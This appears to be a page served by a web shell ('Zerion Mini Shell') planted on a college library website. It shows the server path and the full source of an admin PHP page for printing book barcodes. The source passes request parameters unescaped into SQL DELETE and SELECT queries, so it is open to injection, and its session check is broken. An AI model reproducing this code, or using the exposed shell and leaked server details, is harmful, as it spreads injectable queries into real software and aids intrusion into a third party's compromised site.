ok

Mini Shell

Direktori : /home/ngwcolle/public_html/LIBRARY-NGWC/admin/
Upload File :
Current File : /home/ngwcolle/public_html/LIBRARY-NGWC/admin/book-barcode-print.php

<?php session_start();
//DB conncetion
include_once('includes/config.php');
error_reporting(0);
//validating Session
if (strlen($_SESSION['aid']==0)) {
  header('location:logout.php');
  } else{

//Code for record deletion
if($_GET['teamid']){
$tid=$_GET['teamid'];
mysqli_query($con,"delete from tblteams where id ='$tid'");
echo "<script>alert('Data Deleted');</script>";
echo "<script>window.location.href='manage-teams.php'</script>";
          }
?>

<!DOCTYPE html>
<html lang="en">

<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">

    <title>Book Barcode Print</title>

    <!-- Custom fonts for this template -->
    <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
    <link
        href="https://fonts.googleapis.com/css?family=Nunito:200,200i,300,300i,400,400i,600,600i,700,700i,800,800i,900,900i"
        rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="css/sb-admin-2.min.css" rel="stylesheet">

    <!-- Custom styles for this page -->
    <link href="vendor/datatables/dataTables.bootstrap4.min.css" rel="stylesheet">
<script type="text/javascript">
       function PrintDiv() {
         
         var printContents = document.getElementById("dvContents").innerHTML;
  var originalContents = document.body.innerHTML;

  document.body.innerHTML = printContents;

  window.print();

  document.body.innerHTML = originalContents;
     }
    </script>
</head>

<body id="page-top">

    <!-- Page Wrapper -->
    <div id="wrapper">

        <!-- Sidebar -->
  <?php include_once('includes/sidebar.php');?>
        <!-- End of Sidebar -->

        <!-- Content Wrapper -->
        <div id="content-wrapper" class="d-flex flex-column">

            <!-- Main Content -->
            <div id="content">

                <!-- Topbar -->
<?php include_once('includes/topbar.php');?>
                <!-- End of Topbar -->

                <!-- Begin Page Content -->
                <div class="container-fluid">

                    <!-- Page Heading -->
                       <div class="d-sm-flex align-items-center justify-content-between mb-4">
                        <h1 class="h3 mb-0 text-gray-800">Manage Barcode</h1>
                
                    </div>
    

                    <!-- DataTales Example -->
                    <div class="card shadow mb-4">
                        <div class="card-header py-3">
                            <h6 class="m-0 font-weight-bold text-primary">Search Boooks</h6>
                        </div>
                        <div class="card-body">
										
						
						<div class="container-fluid">
						
  <form class="form-inline" method="post" action="">
    <label for="inlineFormEmail" class="m-2" >Select Department</label>
    
	<select class="form-control m-2" reuiqred name="dept">
	<option>--Select Department--</option>
	<?php
                      
                        $sqli = "SELECT * FROM tbl_department";
                        $result = mysqli_query($con, $sqli);
                        while ($row = mysqli_fetch_array($result)) {
                        echo '<option value="'.$row['id'].'">'.$row['name'].'</option>'; 
                        }
                        ?> 
	</select>
    <label for="inlineFormPassword" class="m-2">Select Category</label>
   <select class="form-control m-2" required name="fund">
		<option value="">--Select Source of Book--</option>    
                        <option value="N">New Purchase</option>
                            <option value="SP">Specimen/Donation</option>
							<option value="O">Old Books</option>
						<option value="OSP">Old Specimen/Donation</option>
	</select>
   
    <button type="submit" class="btn btn-primary m-2" name="submit">Submit</button>
  </form>
  <?php
  if(isset($_POST['submit']))
          {
            $dept=$_POST['dept'];
            $fund=$_POST['fund'];
			
		  }
			?>
</div>
						
							   <!-- book search area -->
							   
							   <div style="width:100%;margin:auto; padding-top:5px;"><center><button type="button" onclick="PrintDiv();" style="font-size:20px;" class="btn btn-success">&#128438; Print</button></center></div>    
							<div class="table-responsive p-1" id="dvContents">
                                <?php
								
								$dyn_table='<table border="1" cellpadding="10" cellspacing="5" width="100%">';
$query=mysqli_query($con,"select * from tbl_book where subject='$dept' and booktype='$fund' order by id asc");
$i=0;
while($row=mysqli_fetch_array($query)){
	$id=$row['id'];
	$bn=$row['barcode'];
	//$bn=<img src = 'includes/barcode.php?codetype=Code39&size=30&text=".$row3['barcode']."&print=true' />;
	if($i%4==0)
	{
		//$dyn_table.='<tr><td>'.$bn.'</td>';
			$dyn_table.='<tr><td style="text-align: center; vertical-align: middle;"><img src ="includes/barcode.php?codetype=Code39&size=42&text='.$bn.'&print=true" /></td>';
	}
	else{
		$dyn_table.='<td style="text-align: center; vertical-align: middle;"><img src ="includes/barcode.php?codetype=Code39&size=42&text='.$bn.'&print=true" /></td>';
	}
	$i++;
}

$dyn_table.='</tr></table>';
echo $dyn_table;
?>

                                      
                              
                            </div>
                        </div>
                    </div>

                </div>
                <!-- /.container-fluid -->

            </div>
            <!-- End of Main Content -->

            <!-- Footer -->
    <?php include_once('includes/footer.php');?>
            <!-- End of Footer -->

        </div>
        <!-- End of Content Wrapper -->

    </div>
    <!-- End of Page Wrapper -->

    <!-- Scroll to Top Button-->
    <?php include_once('includes/footer2.php');?>

    <!-- Bootstrap core JavaScript-->
    <script src="vendor/jquery/jquery.min.js"></script>
    <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>

    <!-- Core plugin JavaScript-->
    <script src="vendor/jquery-easing/jquery.easing.min.js"></script>

    <!-- Custom scripts for all pages-->
    <script src="js/sb-admin-2.min.js"></script>

    <!-- Page level plugins -->
    <script src="vendor/datatables/jquery.dataTables.min.js"></script>
    <script src="vendor/datatables/dataTables.bootstrap4.min.js"></script>

    <!-- Page level custom scripts -->
    <script src="js/demo/datatables-demo.js"></script>
</body>
</html>
<?php } ?>

Zerion Mini Shell 1.0